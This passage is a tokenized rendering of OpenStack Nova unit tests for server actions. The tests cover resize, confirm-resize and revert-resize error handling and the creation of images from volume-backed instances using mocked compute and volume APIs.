string|"'resize'"
op|','
name|'fake_resize'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPForbidden'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_resize_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_resize
name|'def'
name|'fake_resize'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'resize'"
op|','
name|'fake_resize'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.compute.api.API.resize'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'NoValidHost'
op|'('
name|'reason'
op|'='
string|"''"
op|')'
op|')'
newline|'\n'
DECL|member|test_resize_raises_no_valid_host
name|'def'
name|'test_resize_raises_no_valid_host'
op|'('
name|'self'
op|','
name|'mock_resize'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'resize'"
op|')'
newline|'\n'
DECL|member|test_resize_instance_raise_auto_disk_config_exc
name|'def'
name|'test_resize_instance_raise_auto_disk_config_exc'
op|'('
name|'self'
op|','
name|'mock_resize'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_resize'
op|'.'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'AutoDiskConfigDisabledByImage'
op|'('
nl|'\n'
name|'image'
op|'='
string|"'dummy'"
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_confirm_resize_server
dedent|''
name|'def'
name|'test_confirm_resize_server'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'confirmResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'confirm_resize_called'
op|'='
name|'False'
newline|'\n'
nl|'\n'
DECL|function|cr_mock
name|'def'
name|'cr_mock'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'confirm_resize_called'
op|'='
name|'True'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'confirm_resize'"
op|','
name|'cr_mock'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_confirm_resize'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'confirm_resize_called'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_confirm_resize_migration_not_found
dedent|''
name|'def'
name|'test_confirm_resize_migration_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'confirmResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|confirm_resize_mock
name|'def'
name|'confirm_resize_mock'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'MigrationNotFoundByStatus'
op|'('
name|'instance_id'
op|'='
number|'1'
op|','
nl|'\n'
name|'status'
op|'='
string|"'finished'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
nl|'\n'
string|"'confirm_resize'"
op|','
nl|'\n'
name|'confirm_resize_mock'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_confirm_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_confirm_resize_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_confirm_resize_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'confirmResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_confirm_resize
name|'def'
name|'fake_confirm_resize'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'confirm_resize'"
op|','
nl|'\n'
name|'fake_confirm_resize'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_confirm_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_revert_resize_migration_not_found
dedent|''
name|'def'
name|'test_revert_resize_migration_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'revertResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|revert_resize_mock
name|'def'
name|'revert_resize_mock'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'MigrationNotFoundByStatus'
op|'('
name|'instance_id'
op|'='
number|'1'
op|','
nl|'\n'
name|'status'
op|'='
string|"'finished'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
nl|'\n'
string|"'revert_resize'"
op|','
nl|'\n'
name|'revert_resize_mock'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_revert_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_revert_resize_server_not_found
dedent|''
name|'def'
name|'test_revert_resize_server_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'revertResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_revert_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
string|'"bad_server_id"'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_revert_resize_server
dedent|''
name|'def'
name|'test_revert_resize_server'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'revertResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'revert_resize_called'
op|'='
name|'False'
newline|'\n'
nl|'\n'
DECL|function|revert_mock
name|'def'
name|'revert_mock'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'revert_resize_called'
op|'='
name|'True'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'revert_resize'"
op|','
name|'revert_mock'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_revert_resize'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'revert_resize_called'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_revert_resize_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_revert_resize_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'revertResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_revert_resize
name|'def'
name|'fake_revert_resize'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'revert_resize'"
op|','
nl|'\n'
name|'fake_revert_resize'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_revert_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image
dedent|''
name|'def'
name|'test_create_image'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"'Snapshot 1'"
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'location'
op|'='
name|'response'
op|'.'
name|'headers'
op|'['
string|"'Location'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'image_url'
op|'+'
string|"'123'"
name|'if'
name|'self'
op|'.'
name|'image_url'
name|'else'
nl|'\n'
name|'glance'
op|'.'
name|'generate_image_url'
op|'('
string|"'123'"
op|')'
op|','
nl|'\n'
name|'location'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_name_too_long
dedent|''
name|'def'
name|'test_create_image_name_too_long'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'long_name'
op|'='
string|"'a'"
op|'*'
number|'260'
newline|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
name|'long_name'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
name|'self'
op|'.'
name|'req'
op|','
nl|'\n'
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_do_test_create_volume_backed_image
dedent|''
name|'def'
name|'_do_test_create_volume_backed_image'
op|'('
name|'self'
op|','
name|'extra_properties'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|function|_fake_id
indent|' '
name|'def'
name|'_fake_id'
op|'('
name|'x'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
string|"'%s-%s-%s-%s'"
op|'%'
op|'('
name|'x'
op|'*'
number|'8'
op|','
name|'x'
op|'*'
number|'4'
op|','
name|'x'
op|'*'
number|'4'
op|','
name|'x'
op|'*'
number|'12'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'body'
op|'='
name|'dict'
op|'('
name|'createImage'
op|'='
name|'dict'
op|'('
name|'name'
op|'='
string|"'snapshot_of_volume_backed'"
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'if'
name|'extra_properties'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'['
string|"'createImage'"
op|']'
op|'['
string|"'metadata'"
op|']'
op|'='
name|'extra_properties'
newline|'\n'
nl|'\n'
dedent|''
name|'image_service'
op|'='
name|'glance'
op|'.'
name|'get_default_image_service'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'bdm'
op|'='
op|'['
name|'dict'
op|'('
name|'volume_id'
op|'='
name|'_fake_id'
op|'('
string|"'a'"
op|')'
op|','
nl|'\n'
name|'volume_size'
op|'='
number|'1'
op|','
nl|'\n'
name|'device_name'
op|'='
string|"'vda'"
op|','
nl|'\n'
name|'delete_on_termination'
op|'='
name|'False'
op|')'
op|']'
newline|'\n'
nl|'\n'
DECL|function|fake_block_device_mapping_get_all_by_instance
name|'def'
name|'fake_block_device_mapping_get_all_by_instance'
op|'('
name|'context'
op|','
name|'inst_id'
op|','
nl|'\n'
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
op|'['
name|'fake_block_device'
op|'.'
name|'FakeDbBlockDeviceDict'
op|'('
nl|'\n'
op|'{'
string|"'volume_id'"
op|':'
name|'_fake_id'
op|'('
string|"'a'"
op|')'
op|','
nl|'\n'
string|"'source_type'"
op|':'
string|"'snapshot'"
op|','
nl|'\n'
string|"'destination_type'"
op|':'
string|"'volume'"
op|','
nl|'\n'
string|"'volume_size'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'device_name'"
op|':'
string|"'vda'"
op|','
nl|'\n'
string|"'snapshot_id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'boot_index'"
op|':'
number|'0'
op|','
nl|'\n'
string|"'delete_on_termination'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'no_device'"
op|':'
name|'None'
op|'}'
op|')'
op|']'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.block_device_mapping_get_all_by_instance'"
op|','
nl|'\n'
name|'fake_block_device_mapping_get_all_by_instance'
op|')'
newline|'\n'
nl|'\n'
name|'system_metadata'
op|'='
name|'dict'
op|'('
name|'image_kernel_id'
op|'='
name|'_fake_id'
op|'('
string|"'b'"
op|')'
op|','
nl|'\n'
name|'image_ramdisk_id'
op|'='
name|'_fake_id'
op|'('
string|"'c'"
op|')'
op|','
nl|'\n'
name|'image_root_device_name'
op|'='
string|"'/dev/vda'"
op|','
nl|'\n'
name|'image_block_device_mapping'
op|'='
name|'str'
op|'('
name|'bdm'
op|')'
op|','
nl|'\n'
name|'image_container_format'
op|'='
string|"'ami'"
op|')'
newline|'\n'
name|'instance'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
name|'str'
op|'('
name|'uuid'
op|'.'
name|'uuid4'
op|'('
op|')'
op|')'
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'root_device_name'
op|'='
string|"'/dev/vda'"
op|','
nl|'\n'
name|'system_metadata'
op|'='
name|'system_metadata'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'compute_rpcapi'
op|','
nl|'\n'
string|"'quiesce_instance'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'compute_rpcapi'
op|'.'
name|'quiesce_instance'
op|'('
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
op|'.'
name|'AndRaise'
op|'('
nl|'\n'
name|'exception'
op|'.'
name|'InstanceQuiesceNotSupported'
op|'('
name|'instance_id'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'reason'
op|'='
string|"'test'"
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'volume'
op|'='
name|'dict'
op|'('
name|'id'
op|'='
name|'_fake_id'
op|'('
string|"'a'"
op|')'
op|','
nl|'\n'
name|'size'
op|'='
number|'1'
op|','
nl|'\n'
name|'host'
op|'='
string|"'fake'"
op|','
nl|'\n'
name|'display_description'
op|'='
string|"'fake'"
op|')'
newline|'\n'
name|'snapshot'
op|'='
name|'dict'
op|'('
name|'id'
op|'='
name|'_fake_id'
op|'('
string|"'d'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|','
string|"'volume_api'"
op|')'
newline|'\n'
name|'volume_api'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
op|'.'
name|'volume_api'
newline|'\n'
name|'volume_api'
op|'.'
name|'get'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'volume'
op|'['
string|"'id'"
op|']'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'volume'
op|')'
newline|'\n'
name|'volume_api'
op|'.'
name|'create_snapshot_force'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'volume'
op|'['
string|"'id'"
op|']'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'snapshot'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'location'
op|'='
name|'response'
op|'.'
name|'headers'
op|'['
string|"'Location'"
op|']'
newline|'\n'
name|'image_id'
op|'='
name|'location'
op|'.'
name|'replace'
op|'('
name|'self'
op|'.'
name|'image_url'
name|'or'
nl|'\n'
name|'glance'
op|'.'
name|'generate_image_url'
op|'('
string|"''"
op|')'
op|','
string|"''"
op|')'
newline|'\n'
name|'image'
op|'='
name|'image_service'
op|'.'
name|'show'
op|'('
name|'None'
op|','
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'image'
op|'['
string|"'name'"
op|']'
op|','
string|"'snapshot_of_volume_backed'"
op|')'
newline|'\n'
name|'properties'
op|'='
name|'image'
op|'['
string|"'properties'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
string|"'kernel_id'"
op|']'
op|','
name|'_fake_id'
op|'('
string|"'b'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
string|"'ramdisk_id'"
op|']'
op|','
name|'_fake_id'
op|'('
string|"'c'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
string|"'root_device_name'"
op|']'
op|','
string|"'/dev/vda'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'properties'
op|'['
string|"'bdm_v2'"
op|']'
op|')'
newline|'\n'
name|'bdms'
op|'='
name|'properties'
op|'['
string|"'block_device_mapping'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'bdms'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'bdms'
op|'['
number|'0'
op|']'
op|'['
string|"'boot_index'"
op|']'
op|','
number|'0'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'bdms'
op|'['
number|'0'
op|']'
op|'['
string|"'source_type'"
op|']'
op|','
string|"'snapshot'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'bdms'
op|'['
number|'0'
op|']'
op|'['
string|"'destination_type'"
op|']'
op|','
string|"'volume'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'bdms'
op|'['
number|'0'
op|']'
op|'['
string|"'snapshot_id'"
op|']'
op|','
name|'snapshot'
op|'['
string|"'id'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'/dev/vda'"
op|','
name|'bdms'
op|'['
number|'0'
op|']'
op|'['
string|"'device_name'"
op|']'
op|')'
newline|'\n'
name|'for'
name|'fld'
name|'in'
op|'('
string|"'connection_info'"
op|','
string|"'id'"
op|','
string|"'instance_uuid'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertNotIn'
op|'('
name|'fld'
op|','
name|'bdms'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
dedent|''
name|'for'
name|'k'
name|'in'
name|'extra_properties'
op|'.'
name|'keys'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'properties'
op|'['
name|'k'
op|']'
op|','
name|'extra_properties'
op|'['
name|'k'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_volume_backed_image_no_metadata
dedent|''
dedent|''
name|'def'
name|'test_create_volume_backed_image_no_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_do_test_create_volume_backed_image'
op|'('
op|'{'
op|'}'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_volume_backed_image_with_metadata
dedent|''
name|'def'
name|'test_create_volume_backed_image_with_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_do_test_create_volume_backed_image'
op|'('
name|'dict'
op|'('
name|'ImageType'
op|'='
string|"'Gold'"
op|','
nl|'\n'
name|'ImageVersion'
op|'='
string|"'2.0'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_create_volume_backed_image_with_metadata_from_volume
dedent|''
name|'def'
name|'_test_create_volume_backed_image_with_metadata_from_volume'
op|'('
nl|'\n'
name|'self'
op|','
name|'extra_metadata'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|function|_fake_id
indent|' '
name|'def'
name|'_fake_id'
op|'('
name|'x'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
string|"'%s-%s-%s-%s'"
op|'%'
op|'('
name|'x'
op|'*'
number|'8'
op|','
name|'x'
op|'*'
number|'4'
op|','
name|'x'
op|'*'
number|'4'
op|','
name|'x'
op|'*'
number|'12'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'body'
op|'='
name|'dict'
op|'('
name|'createImage'
op|'='
name|'dict'
op|'('
name|'name'
op|'='
string|"'snapshot_of_volume_backed'"
op|')'
op|')'
newline|'\n'
name|'if'
name|'extra_metadata'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'['
string|"'createImage'"
op|']'
op|'['
string|"'metadata'"
op|']'
op|'='
name|'extra_metadata'
newline|'\n'
nl|'\n'
dedent|''
name|'image_service'
op|'='
name|'glance'
op|'.'
name|'get_default_image_service'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_block_device_mapping_get_all_by_instance
name|'def'
name|'fake_block_device_mapping_get_all_by_instance'
op|'('
name|'context'
op|','
name|'inst_id'
op|','
nl|'\n'
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
op|'['
name|'fake_block_device'
op|'.'
name|'FakeDbBlockDeviceDict'
op|'('
nl|'\n'
op|'{'
string|"'volume_id'"
op|':'
name|'_fake_id'
op|'('
string|"'a'"
op|')'
op|','
nl|'\n'
string|"'source_type'"
op|':'
string|"'snapshot'"
op|','
nl|'\n'
string|"'destination_type'"
op|':'
string|"'volume'"
op|','
nl|'\n'
string|"'volume_size'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'device_name'"
op|':'
string|"'vda'"
op|','
nl|'\n'
string|"'snapshot_id'"
op|':'
number|'1'
op|','
nl|'\n'
string|"'boot_index'"
op|':'
number|'0'
op|','
nl|'\n'
string|"'delete_on_termination'"
op|':'
name|'False'
op|','
nl|'\n'
string|"'no_device'"
op|':'
name|'None'
op|'}'
op|')'
op|']'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.block_device_mapping_get_all_by_instance'"
op|','
nl|'\n'
name|'fake_block_device_mapping_get_all_by_instance'
op|')'
newline|'\n'
nl|'\n'
name|'instance'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
nl|'\n'
name|'image_ref'
op|'='
string|"''"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'root_device_name'
op|'='
string|"'/dev/vda'"
op|','
nl|'\n'
name|'system_metadata'
op|'='
op|'{'
string|"'image_test_key1'"
op|':'
string|"'test_value1'"
op|','
nl|'\n'
string|"'image_test_key2'"
